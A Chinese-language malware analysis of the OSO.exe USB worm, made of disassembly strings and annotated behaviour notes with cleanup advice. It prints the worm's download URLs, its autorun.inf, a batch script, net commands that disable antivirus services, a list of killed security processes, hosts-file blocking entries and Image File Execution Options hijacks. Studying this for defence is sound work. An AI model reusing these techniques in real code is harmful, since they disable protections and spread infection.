0040A3FF push OSO.0040A469 ASCII ".exe"
0040A422 mov ecx,OSO.0040A59D ASCII "Debugger"
0040A427 mov edx,OSO.0040AF2D ASCII "Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe"
0040B02F mov eax,OSO.0040B225 ASCII "A}cNqqc{[TWQkgdfv7(3"
0040B04E mov eax,OSO.0040B245 ASCII "@ijNqqc{[TWQkgdfv7(3"
0040B06A push OSO.0040B25D ASCII "AntiTrojan3721"
0040B078 push OSO.0040B26D ASCII "ASSISTSHELLMUTEX"
0040B086 push OSO.0040B281 ASCII "SKYNET_PERSONAL_FIREWALL"
0040B094 push OSO.0040B29D ASCII "KingsoftAntivirusScanProgram7Mutex"
0040B0BC mov edx,OSO.0040B2C9 ASCII "glqq"
0040B0DF mov edx,OSO.0040B2C9 ASCII "glqq"
0040B10B push OSO.0040B2D9 ASCII ".exe"
0040B13F push OSO.0040B2E9 ASCII ".dll"
0040B16C mov edx,OSO.0040B2F9 ASCII "severe.exe"
0040B191 push OSO.0040B30D ASCII "drivers\"
0040B196 push OSO.0040B321 ASCII "conime.exe"
0040B1C3 push OSO.0040B30D ASCII "drivers\"
0040B1CF push OSO.0040B2D9 ASCII ".exe"
0040B35B mov eax,OSO.0040B3AD ASCII "r`t`hvog*agw"
0040B3EF mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B461 mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B4AA mov eax,OSO.0040B4F9 ASCII "r`t`hvog*agw"
0040B532 mov edx,OSO.0040B6E5 ASCII "kakatool.dll"
0040B55E mov eax,OSO.0040B6FD ASCII "D&" *mrn"
0040B58F mov edx,OSO.0040B711 ASCII "glqq"
0040B5B6 mov eax,OSO.0040B721 ASCII "`tn{5+r{p"
0040B5E6 mov eax,OSO.0040B735 ASCII "`tn{6+r{p"
0040B616 mov eax,OSO.0040B749 ASCII "`tn{7+r{p"
0040B646 mov eax,OSO.0040B6FD ASCII "D&" *mrn"
0040B672 mov edx,OSO.0040B711 ASCII "glqq"
0040B68D mov eax,OSO.0040B75D ASCII "JQbkgu(f|`"
0040B6A2 mov eax,OSO.0040B771 ASCII "WSEKK]R-A]C"
0040B7D9 push OSO.0040B879 ASCII "drivers\"
0040B7DE push OSO.0040B88D ASCII "conime.exe"
0040B81C push OSO.0040B879 ASCII "drivers\"
0040B821 push OSO.0040B88D ASCII "conime.exe"
0040B83C push OSO.0040B899 ASCII "open"
0040B8C6 push OSO.0040B935 ASCII "drivers\"
0040B8CB push OSO.0040B949 ASCII "conime.exe"
0040B9B8 push OSO.0040BA55 ASCII ".exe"
0040B9FD push OSO.0040BA55 ASCII ".exe"
0040BA18 push OSO.0040BA5D ASCII "open"
0040BABF mov edx,OSO.0040BB45 ASCII "severe.exe"
0040BAF5 mov edx,OSO.0040BB45 ASCII "severe.exe"
0040BB08 push OSO.0040BB51 ASCII "open"
0040BB82 push OSO.0040BC29 ASCII ".exe"
0040BBCD mov edx,OSO.0040BC39 ASCII "severe.exe"
0040BCA1 push OSO.0040BD41 ASCII "drivers\"
0040BCA6 push OSO.0040BD55 ASCII "conime.exe"
0040BCE4 push OSO.0040BD41 ASCII "drivers\"
0040BCE9 push OSO.0040BD55 ASCII "conime.exe"
0040BD04 push OSO.0040BD61 ASCII "open"
0040BD89 push OSO.0040BE15 ASCII "drivers\"
0040BD8E push OSO.0040BE29 ASCII "conime.exe"
0040BDD5 mov edx,OSO.0040BE3D ASCII "yes"
0040C0D2 mov eax,OSO.0040C175 ASCII "HXQ"
0040C0FD mov edx,OSO.0040C175 ASCII "HXQ"
0040C231 push ebp (初始 CPU 选择)
0040C2A6 mov eax,OSO.0040CDDD ASCII "d:\OSO.exe"
0040C2BF push OSO.0040CDE9 ASCII "d:\"
0040C2C4 push OSO.0040CDED ASCII "Explorer.exe"
0040C2C9 push OSO.0040CDFD ASCII "open"
0040C2E6 mov eax,OSO.0040CE0D ASCII "e:\OSO.exe"
0040C2FF push OSO.0040CE19 ASCII "e:\"
0040C304 push OSO.0040CDED ASCII "Explorer.exe"
0040C309 push OSO.0040CDFD ASCII "open"
0040C326 mov eax,OSO.0040CE25 ASCII "f:\OSO.exe"
0040C33F push OSO.0040CE31 ASCII "f:\"
0040C344 push OSO.0040CDED ASCII "Explorer.exe"
0040C349 push OSO.0040CDFD ASCII "open"
0040C366 mov eax,OSO.0040CE3D ASCII "g:\OSO.exe"
0040C37F push OSO.0040CE49 ASCII "g:\"
0040C384 push OSO.0040CDED ASCII "Explorer.exe"
0040C389 push OSO.0040CDFD ASCII "open"
0040C3A6 mov eax,OSO.0040CE55 ASCII "h:\OSO.exe"
0040C3BF push OSO.0040CE61 ASCII "h:\"
0040C3C4 push OSO.0040CDED ASCII "Explorer.exe"
0040C3C9 push OSO.0040CDFD ASCII "open"
0040C3E6 mov eax,OSO.0040CE6D ASCII "i:\OSO.exe"
0040C3FF push OSO.0040CE79 ASCII "i:\"
0040C404 push OSO.0040CDED ASCII "Explorer.exe"
0040C409 push OSO.0040CDFD ASCII "open"
0040C420 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C446 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C469 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C48E mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C4C0 push OSO.0040CE99 ASCII ".exe"
0040C4F4 push OSO.0040CE99 ASCII ".exe"
0040C521 push OSO.0040CE99 ASCII ".exe"
0040C550 push OSO.0040CE99 ASCII ".exe"
0040C583 push OSO.0040CEA9 ASCII "drivers\"
0040C58F push OSO.0040CE99 ASCII ".exe"
0040C5C1 push OSO.0040CEA9 ASCII "drivers\"
0040C5CD push OSO.0040CE99 ASCII ".exe"
0040C5FE push OSO.0040CEA9 ASCII "drivers\"
0040C60A push OSO.0040CE99 ASCII ".exe"
0040C643 push OSO.0040CEA9 ASCII "drivers\"
0040C64F push OSO.0040CE99 ASCII ".exe"
0040C68E push OSO.0040CEA9 ASCII "drivers\"
0040C693 push OSO.0040CEBD ASCII "conime.exe"
0040C6D1 push OSO.0040CEA9 ASCII "drivers\"
0040C6D6 push OSO.0040CEBD ASCII "conime.exe"
0040C70D push OSO.0040CEA9 ASCII "drivers\"
0040C712 push OSO.0040CEBD ASCII "conime.exe"
0040C74B push OSO.0040CEA9 ASCII "drivers\"
0040C750 push OSO.0040CEBD ASCII "conime.exe"
0040C7A5 push OSO.0040CE99 ASCII ".exe"
0040C802 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C854 push OSO.0040CEA9 ASCII "drivers\"
0040C859 push OSO.0040CEBD ASCII "conime.exe"
0040C8AA push OSO.0040CE99 ASCII ".exe"
0040C8CB push OSO.0040CDFD ASCII "open"
0040C8EE mov edx,OSO.0040CE85 ASCII "severe.exe"
0040C904 push OSO.0040CDFD ASCII "open"
0040C927 push OSO.0040CEA9 ASCII "drivers\"
0040C92C push OSO.0040CEBD ASCII "conime.exe"
0040C94D push OSO.0040CDFD ASCII "open"
0040C9D9 push OSO.0040CE99 ASCII ".exe"
0040CA17 mov eax,OSO.0040CED1 ASCII "U]+2"
0040CA47 mov eax,OSO.0040CED1 ASCII "U]+2"
0040CACE push OSO.0040CEE1 ASCII ".dll"
0040CAF0 mov edx,OSO.0040CEE9 ASCII "dll"
0040CAF5 mov eax,OSO.0040CEED ASCII "dllfile"
0040CB17 push OSO.0040CEE1 ASCII ".dll"
0040CB50 push OSO.0040CEE1 ASCII ".dll"
0040CB78 push OSO.0040CEF5 ASCII "HookOn"
0040CB99 push OSO.0040CEFD ASCII "HookOff"
0040CBD3 push OSO.0040CEA9 ASCII "drivers\"
0040CBD8 push OSO.0040CEBD ASCII "conime.exe"
0040CC16 mov eax,OSO.0040CF0D ASCII "U]+1"
0040CC46 mov eax,OSO.0040CF0D ASCII "U]+1"
0040CCD9 mov edx,OSO.0040CE85 ASCII "severe.exe"
0040CD0C mov eax,OSO.0040CF1D ASCII "U]+0"
0040CD38 mov eax,OSO.0040CF1D ASCII "U]+0"
004134DF mov ebx,OSO.00400000 ASCII "MZ"
0041356A mov edx,OSO.00400000 ASCII "MZ"

这个是U盘感染者，跟我前次分析的那个只是OEP不一样，可能是个变种。

3.释放的病毒:
0012FE54 00CC0238 |NewFileName = "D:\winnt\system32\severe.exe"
0012FE54 00CC0350 |NewFileName = "D:\winnt\system32\.exe" ; 文件名也可能是随机的
0012FE54 00CC0478 |NewFileName = "D:\winnt\system32\drivers\.exe" ; 文件名也可能是随机的
0012FE54 00CC05C0 |NewFileName = "D:\winnt\system32\drivers\conime.exe"

这里 .exe 的文件名可能是随机生成的，也可能是因变种不同而不同。
下文中的 .exe 如果目录位置相同，那么文件名也应该跟这里的一致。

4.静态分析:按照字符串顺序
4.1 修改系统时间:
00404C75 BA A54D4000 mov edx,dumped_.00404DA5 ; ASCII "hx1.bat"
路径:"D:\winnt\system32\hx1.bat"

@echo off
set date=2004-1-22
ping ** localhost > nul
date %date%
del %0

4.2 从网络下载病毒:
004057BF 8D55 FC lea edx,dword ptr ss:[ebp-4]
004057C2 B8 8D594000 mov eax,dumped_.0040598D ; ASCII "lqrs>*)tsr(``642*kcw+66t*q~w"
004057C7 E8 5DF9FFFF call dumped_.00405129
堆栈 ss:[0012FFEC]=00CC0040, (ASCII "http://www.cd321.net/30w.txt")

堆栈 ss:[0012FF8C]=00CC0170, (ASCII "D:\winnt\system32\dqhx1.txt")

0040585A E8 62F0FFFF call <jmp.&urlmon.URLDownloadToFileA>

00405909 B8 C9594000 mov eax,dumped_.004059C9 ; ASCII "A}vokwcq*`~f"
0040590E E8 16F8FFFF call dumped_.00405129 ; 解密后为:Explorer.exe(12字节密文对应12字节明文,不是 explore.exe)

0040591F B8 E1594000 mov eax,dumped_.004059E1 ; ASCII "kucm"
00405924 E8 00F8FFFF call dumped_.00405129 ; 解密后为open

00405934 E8 10EFFFFF call <jmp.&shell32.ShellExecuteA>
00405946 E8 1EECFFFF call <jmp.&kernel32.DeleteFileA>
00405958 E8 34EEFFFF call <jmp.&wininet.DeleteUrlCacheEntry>

关于解密例程 00405129:本文给出的所有密文/明文对(如 "kucm"→"open","lqrs>*)tsr("→"http://www.","r`t`hvog*agw"→"verclsid.dat","D&" *mrn"→"@#$#.htm")都符合"逐字节与循环密钥 04 05 06 03 异或"的规律,用这个密钥可以离线还原文中其余未解出的字符串。例程内部实现没有贴出,以上是由样本对推出的等价描述。
病毒从 http://www.cd321.net/30w.txt 下载文件(从名字看像是一个下载地址列表,内容未验证)。
下载到硬盘:D:\winnt\system32\dqhx1.txt(URLDownloadToFileA;这段代码里看不到任何签名或校验,下来什么就用什么)。
执行后 DeleteFileA 删除本地文件,再 DeleteUrlCacheEntry 清掉 IE 缓存里的下载记录,应是为了减少痕迹。

另一个下载地址列表为:
00405A11 8D55 FC lea edx,dword ptr ss:[ebp-4]
00405A14 B8 C95D4000 mov eax,dumped_.00405DC9 ; ASCII "lqrs>*)tsr(`ps757+eli*ggilh,`jqm*q~w"
00405A19 E8 0BF7FFFF call dumped_.00405129
堆栈 ss:[0012FF68]=00CC0434, (ASCII "http://www.ctv163.com/admin/down.txt")

下载到:(ASCII "D:\winnt\system32\dqhx3.txt")

4.3 对移动盘植入病毒:
00405E8C 50 push eax ; 压入盘符
00405E8D E8 17E7FFFF call <jmp.&kernel32.GetDriveTypeA>
00405E92 83F8 02 cmp eax,2 ; 是不是u盘?
00405E95 0F85 FF020000 jnz dumped_.0040619A

GetDriveTypeA 返回 2 = DRIVE_REMOVABLE(软驱、U盘等可移动盘),
返回 3 = DRIVE_FIXED(本地硬盘)。这里只对返回值为 2 的盘符执行下面的植入逻辑,返回值不等于 2 直接跳过。

假设E盘为U盘,先删除原有文件:
0012FC08 00CC0158 \FileName = "E:\autorun.inf"
0012FC08 00CC0174 \FileName = "E:oso.exe"
0012FC08 00CC0190 \FileName = "E:\重要资料.exe"
0012FC08 00CC01AC \FileName = "E:\美女游戏.pif"

然后拷贝病毒过去并更名为相应的名称("重要资料.exe"、"美女游戏.pif" 这类名字是为了诱骗用户手动点击),再创建 autorun.inf。下面三个键分别覆盖了自动播放的 open、shellexecute 以及资源管理器里双击/右键盘符时的默认动作(shell\Auto\command),所以在当时的 XP 上即使关掉了自动播放,用户双击盘符仍可能触发。清理U盘时必须同时删除 autorun.inf、OSO.exe、"重要资料.exe" 和 "美女游戏.pif"。

[AutoRun]
open=OSO.exe
shellexecute=OSO.exe
shell\Auto\command=OSO.exe

4.4 硬盘植入病毒:
004062FD 50 push eax
004062FE E8 A6E2FFFF call <jmp.&kernel32.GetDriveTypeA>
00406303 83F8 03 cmp eax,3
00406306 0F85 3D020000 jnz dumped_.00406549

那么只在该硬盘分区的根目录写入 OSO.exe 和 autorun.inf(不再释放 4.3 里那两个伪装名称的副本)。清理时每个本地分区的根目录都要检查。

4.5 创建网页,写入不安全网址:
先判断是否连接上网:
00407784 E8 10D0FFFF call <jmp.&wininet.InternetGetConnectedState>

创建网页写入网址:
004077A0 B8 AD7A4000 mov eax,dumped_.00407AAD ; ASCII "D&" *mrn"
004077A5 E8 7FD9FFFF call dumped_.00405129 ; 网页名称
堆栈 ss:[0012FE6C]=00CC0464, (ASCII "@#$#.htm")

路径:堆栈 ss:[0012FE70]=00CC0410, (ASCII "D:\winnt\system32\@#$#.htm")
内容:<FRAMESET> <FRAME src="http://www.ctv163.com"> </FRAMESET>

中间<FRAME src="http://www.ctv163.com">的内容可变,总共有这么几个:
0040781C mov eax,OSO.00407AC1 ASCII "lqrs>*)tsr(``642*fin"
00407835 mov eax,OSO.00407AE1 ASCII "lqrs>*)tsr(``642*kcw"
0040784E mov eax,OSO.00407B01 ASCII "lqrs>*)tsr(532?43+eli"
00407867 mov eax,OSO.00407B21 ASCII "lqrs>*)tsr(`ps757+eli"
解密后分别是:
堆栈 ss:[0012FE74]=00CC0730, (ASCII "http://www.cd321.com")
堆栈 ss:[0012FE74]=00CC0774, (ASCII "http://www.cd321.net")
堆栈 ss:[0012FE74]=00CC07B8, (ASCII "http://www.677977.com")
堆栈 ss:[0012FE74]=00CC07FC, (ASCII "http://www.ctv163.com")

然后用 ShellExecuteA 打开这个本地 htm(通过框架页加载上面的站点;从代码看不出进一步用途,推测是刷流量或带回更多下载,待确认):
00407A64 E8 E0CDFFFF call <jmp.&shell32.ShellExecuteA>

4.6 关闭服务,包括杀软:
004082F2 6A 00 push 0
004082F4 6A 00 push 0
004082F6 68 E5864000 push dumped_.004086E5 ; ASCII "stop srservice"
004082FB 68 F5864000 push dumped_.004086F5 ; ASCII "net.exe"
00408300 68 FD864000 push dumped_.004086FD ; ASCII "open"
00408305 6A 00 push 0
00408307 E8 3DC5FFFF call <jmp.&shell32.ShellExecuteA>

有这些(srservice = 系统还原服务,sharedaccess = Windows 防火墙/ICS,KVWSC/KVSrvXP = 江民,kavsvc = 金山毒霸,RsRavMon/RsCCenter = 瑞星)。调用形式为 ShellExecuteA(0,"open","net.exe","<参数>",NULL,0),nShowCmd=0 即 SW_HIDE,窗口不可见;先 stop 再 config start= disabled,重启后服务也不会自己恢复,清理时要手动把启动类型改回来:
004082F6 push OSO.004086E5 ASCII "stop srservice"
00408310 push OSO.00408705 ASCII "config srservice start= disabled"
0040832A push OSO.00408731 ASCII "stop sharedaccess"
00408344 push OSO.00408745 ASCII "stop KVWSC"
0040835E push OSO.00408751 ASCII "config KVWSC start= disabled"
00408378 push OSO.00408771 ASCII "stop KVSrvXP"
00408392 push OSO.00408781 ASCII "config KVSrvXP start= disabled"
004083AC push OSO.004087A1 ASCII "stop kavsvc"
004083C6 push OSO.004087AD ASCII "config kavsvc start= disabled"
004083E0 push OSO.004087CD ASCII "config RsRavMon start= disabled"
004083FA push OSO.004087ED ASCII "stop RsCCenter"
00408414 push OSO.004087FD ASCII "config RsCCenter start= disabled"
0040842E push OSO.00408821 ASCII "stop RsRavMon"

并且处理瑞星的弹窗:用 FindWindowA 按窗口类 "#32770"(标准对话框)和标题"瑞星提示"找到提示框,再用 FindWindowExA 找到里面的 "是(&Y)" 按钮,后面应是模拟点击自动确认(点击部分的代码没有贴出):
0040844E 68 31884000 push dumped_.00408831 ; 瑞星提示
00408453 68 3D884000 push dumped_.0040883D ; ASCII "#32770"
00408458 E8 FCC1FFFF call <jmp.&user32.FindWindowA>
0040845D 68 45884000 push dumped_.00408845 ; 是(&Y)..
00408462 68 4D884000 push dumped_.0040884D ; ASCII "Button"
00408467 6A 00 push 0
00408469 50 push eax
0040846A E8 F2C1FFFF call <jmp.&user32.FindWindowExA>

4.7 结束进程,包括杀软:
00408482 B8 5D884000 mov eax,dumped_.0040885D ; ASCII "sc.exe"
00408487 E8 1DCAFFFF call dumped_.00404EA9

00404FD3 E8 51F6FFFF call <jmp.&kernel32.TerminateProcess>

包括(按进程映像名匹配后 TerminateProcess;注意 cmd.exe、net.exe、sc.exe、net1.exe 也在列表里,手工清理时命令行工具会被反复杀掉,可以先把工具改名再运行):
00408482 mov eax,OSO.0040885D ASCII "sc.exe"
0040848C mov eax,OSO.0040886D ASCII "cmd.exe"
00408496 mov eax,OSO.0040887D ASCII "net.exe"
004084A0 mov eax,OSO.0040888D ASCII "sc1.exe"
004084AA mov eax,OSO.0040889D ASCII "net1.exe"
004084B4 mov eax,OSO.004088B1 ASCII "PFW.exe"
004084BE mov eax,OSO.004088C1 ASCII "Kav.exe"
004084C8 mov eax,OSO.004088D1 ASCII "KVOL.exe"
004084D2 mov eax,OSO.004088E5 ASCII "KVFW.exe"
004084DC mov eax,OSO.004088F9 ASCII "adam.exe"
004084E6 mov eax,OSO.0040890D ASCII "qqav.exe"
004084F0 mov eax,OSO.00408921 ASCII "qqkav.exe"
004084FA mov eax,OSO.00408935 ASCII "TBMon.exe"
00408504 mov eax,OSO.00408949 ASCII "kav32.exe"
0040850E mov eax,OSO.0040895D ASCII "kvwsc.exe"
00408518 mov eax,OSO.00408971 ASCII "CCAPP.exe"
00408522 mov eax,OSO.00408985 ASCII "KRegEx.exe"
0040852C mov eax,OSO.00408999 ASCII "kavsvc.exe"
00408536 mov eax,OSO.004089AD ASCII "VPTray.exe"
00408540 mov eax,OSO.004089C1 ASCII "RAVMON.exe"
0040854A mov eax,OSO.004089D5 ASCII "EGHOST.exe"
00408554 mov eax,OSO.004089E9 ASCII "KavPFW.exe"
0040855E mov eax,OSO.004089FD ASCII "SHSTAT.exe"
00408568 mov eax,OSO.00408A11 ASCII "RavTask.exe"
00408572 mov eax,OSO.00408A25 ASCII "TrojDie.kxp"
0040857C mov eax,OSO.00408A39 ASCII "Iparmor.exe"
00408586 mov eax,OSO.00408A4D ASCII "MAILMON.exe"
00408590 mov eax,OSO.00408A61 ASCII "MCAGENT.exe"
0040859A mov eax,OSO.00408A75 ASCII "KAVPLUS.exe"
004085A4 mov eax,OSO.00408A89 ASCII "RavMonD.exe"
004085AE mov eax,OSO.00408A9D ASCII "Rtvscan.exe"
004085B8 mov eax,OSO.00408AB1 ASCII "Nvsvc32.exe"
004085C2 mov eax,OSO.00408AC5 ASCII "KVMonXP.exe"
004085CC mov eax,OSO.00408AD9 ASCII "Kvsrvxp.exe"
004085D6 mov eax,OSO.00408AED ASCII "CCenter.exe"
004085E0 mov eax,OSO.00408B01 ASCII "KpopMon.exe"
004085EA mov eax,OSO.00408B15 ASCII "RfwMain.exe"
004085F4 mov eax,OSO.00408B29 ASCII "KWATCHUI.exe"
004085FE mov eax,OSO.00408B41 ASCII "MCVSESCN.exe"
00408608 mov eax,OSO.00408B59 ASCII "MSKAGENT.exe"
00408612 mov eax,OSO.00408B71 ASCII "kvolself.exe"
0040861C mov eax,OSO.00408B89 ASCII "KVCenter.kxp"
00408626 mov eax,OSO.00408BA1 ASCII "kavstart.exe"
00408630 mov eax,OSO.00408BB9 ASCII "RAVTIMER.exe"
0040863A mov eax,OSO.00408BD1 ASCII "RRfwMain.exe"
00408644 mov eax,OSO.00408BE9 ASCII "FireTray.exe"
0040864E mov eax,OSO.00408C01 ASCII "UpdaterUI.exe"
00408658 mov eax,OSO.00408C19 ASCII "KVSrvXp_1.exe"
00408662 mov eax,OSO.00408C31 ASCII "RavService.exe"

4.8 修改hosts使无法访问某些安全网站:
把下面这些杀软官网、升级服务器和在线查杀站点指向 127.0.0.1,阻断杀软升级和在线查杀。清理时要还原系统目录下 drivers\etc\hosts 文件(本机为 D:\winnt\system32\drivers\etc\hosts)。添加的网站有:
00408D45 mov edx,OSO.00409115 ASCII "127.0.0.1 mmsk.cn"
00408D5B mov edx,OSO.0040912D ASCII "127.0.0.1 ikaka.com"
00408D71 mov edx,OSO.00409149 ASCII "127.0.0.1 safe.qq.com"
00408D87 mov edx,OSO.00409165 ASCII "127.0.0.1 360safe.com"
00408D9D mov edx,OSO.00409181 ASCII "127.0.0.1 [url=http://www.mmsk.cn]www.mmsk.cn[/url]"
00408DB3 mov edx,OSO.0040919D ASCII "127.0.0.1 [url=http://www.ikaka.com]www.ikaka.com[/url]"

00408DC9 mov edx,OSO.004091BD ASCII "127.0.0.1 tool.ikaka.com"
00408DDF mov edx,OSO.004091DD ASCII "127.0.0.1 [url=http://www.360safe.com]www.360safe.com[/url]"
00408DF5 mov edx,OSO.004091FD ASCII "127.0.0.1 zs.kingsoft.com"
00408E0B mov edx,OSO.0040921D ASCII "127.0.0.1 forum.ikaka.com"
00408E21 mov edx,OSO.0040923D ASCII "127.0.0.1 up.rising.com.cn"
00408E37 mov edx,OSO.00409261 ASCII "127.0.0.1 scan.kingsoft.com"
00408E4D mov edx,OSO.00409285 ASCII "127.0.0.1 kvup.jiangmin.com"
00408E63 mov edx,OSO.004092A9 ASCII "127.0.0.1 reg.rising.com.cn"
00408E79 mov edx,OSO.004092CD ASCII "127.0.0.1 update.rising.com.cn"
00408E8F mov edx,OSO.004092F5 ASCII "127.0.0.1 update7.jiangmin.com"
00408EA5 mov edx,OSO.0040931D ASCII "127.0.0.1 download.rising.com.cn"
00408EBB mov edx,OSO.00409345 ASCII "127.0.0.1 dnl-us1.kaspersky-labs.com"
00408ED1 mov edx,OSO.00409371 ASCII "127.0.0.1 dnl-us2.kaspersky-labs.com"
00408EE7 mov edx,OSO.0040939D ASCII "127.0.0.1 dnl-us3.kaspersky-labs.com"
00408EFD mov edx,OSO.004093C9 ASCII "127.0.0.1 dnl-us4.kaspersky-labs.com"
00408F13 mov edx,OSO.004093F5 ASCII "127.0.0.1 dnl-us5.kaspersky-labs.com"
00408F29 mov edx,OSO.00409421 ASCII "127.0.0.1 dnl-us6.kaspersky-labs.com"
00408F3F mov edx,OSO.0040944D ASCII "127.0.0.1 dnl-us7.kaspersky-labs.com"
00408F55 mov edx,OSO.00409479 ASCII "127.0.0.1 dnl-us8.kaspersky-labs.com"
00408F6B mov edx,OSO.004094A5 ASCII "127.0.0.1 dnl-us9.kaspersky-labs.com"
00408F81 mov edx,OSO.004094D1 ASCII "127.0.0.1 dnl-us10.kaspersky-labs.com"
00408F97 mov edx,OSO.004094FD ASCII "127.0.0.1 dnl-eu1.kaspersky-labs.com"
00408FAD mov edx,OSO.00409529 ASCII "127.0.0.1 dnl-eu2.kaspersky-labs.com"
00408FC3 mov edx,OSO.00409555 ASCII "127.0.0.1 dnl-eu3.kaspersky-labs.com"
00408FD9 mov edx,OSO.00409581 ASCII "127.0.0.1 dnl-eu4.kaspersky-labs.com"
00408FEF mov edx,OSO.004095AD ASCII "127.0.0.1 dnl-eu5.kaspersky-labs.com"
00409005 mov edx,OSO.004095D9 ASCII "127.0.0.1 dnl-eu6.kaspersky-labs.com"
0040901B mov edx,OSO.00409605 ASCII "127.0.0.1 dnl-eu7.kaspersky-labs.com"
00409031 mov edx,OSO.00409631 ASCII "127.0.0.1 dnl-eu8.kaspersky-labs.com"
00409047 mov edx,OSO.0040965D ASCII "127.0.0.1 dnl-eu9.kaspersky-labs.com"
0040905D mov edx,OSO.00409689 ASCII "127.0.0.1 dnl-eu10.kaspersky-labs.com"

4.9 改变驱动器的自动播放策略(写入 noruns.reg 后用 regedit 导入):
堆栈 ss:[0012FC18]=00CC0464, (ASCII "D:\winnt\system32\noruns.reg")

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:b5 ; 默认为91(H)

0xB5 = 0x80|0x20|0x10|0x04|0x01。按微软对 NoDriveTypeAutoRun 的位定义,这是在未知类型、可移动盘(0x04)、网络盘(0x10)、光驱(0x20)上禁用自动播放,只剩本地硬盘(0x08)和 RAM 盘(0x40)保留;XP 默认的 0x91 只禁了 0x80|0x10|0x01。为何反而关掉U盘的自动播放原因不明(可能是排挤其他U盘病毒,待确认),但 4.3 里写入的 shell\Auto\command 在用户双击盘符时照样会触发,不要把这个改动误当成对用户的保护。导入后删除 reg 文件:
004097F4 68 39994000 push dumped_.00409939 ; ASCII "regedit.exe"
004097F9 68 45994000 push dumped_.00409945 ; ASCII "open"
004097FE 6A 00 push 0
00409800 E8 44B0FFFF call <jmp.&shell32.ShellExecuteA>
...
00409837 E8 2DADFFFF call <jmp.&kernel32.DeleteFileA>

4.10 关闭瑞星注册表监控提示:
004099B9 68 999A4000 push dumped_.00409A99 ; 瑞星注册表监控提示
004099BE 68 AD9A4000 push dumped_.00409AAD ; ASCII "#32770"
004099C3 E8 91ACFFFF call <jmp.&user32.FindWindowA>

4.11 设置注册表:
自启动:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Default) SUCCESS "D:\winnt\system32\.exe"
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\(Default) SUCCESS "D:\winnt\system32\severe.exe"
Shell(Winlogon\Shell 被改成 "Explorer.exe D:\...\drivers\conime.exe",使 conime.exe 随用户登录启动;清理时恢复为 Explorer.exe):
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell SUCCESS "Explorer.exe D:\winnt\system32\drivers\conime.exe"
隐藏(把 SHOWALL\CheckedValue 改成 0 后,文件夹选项里"显示所有文件和文件夹"即使选中也不生效,释放的文件保持隐藏;清理时要改回 1):
HKLM\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\CheckedValue SUCCESS "0"

以下所有键值替换为:"D:\winnt\system32\drivers\.exe"。这是 Image File Execution Options 的 Debugger 劫持:用户启动这些杀软、防火墙和系统工具(regedit、msconfig、IceSword、SREng、360Safe 等)时,实际被启动的是病毒。清理时必须删掉这些 Debugger 值,否则这些工具一个也用不了:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.EXE\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe\Debugger SUCCESS
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.com\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe\Debugger
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NOD32.exe\Debugger

4.12 创建互斥量(名字与 QQ大盗 相同):
0040B02F mov eax,OSO.0040B225 ASCII "A}cNqqc{[TWQkgdfv7(3"
0040B04E mov eax,OSO.0040B245 ASCII "@ijNqqc{[TWQkgdfv7(3"
解密后分别为:
堆栈 ss:[00127D28]=00CC2FA0, (ASCII "ExeMutex_QQRobber2.0")
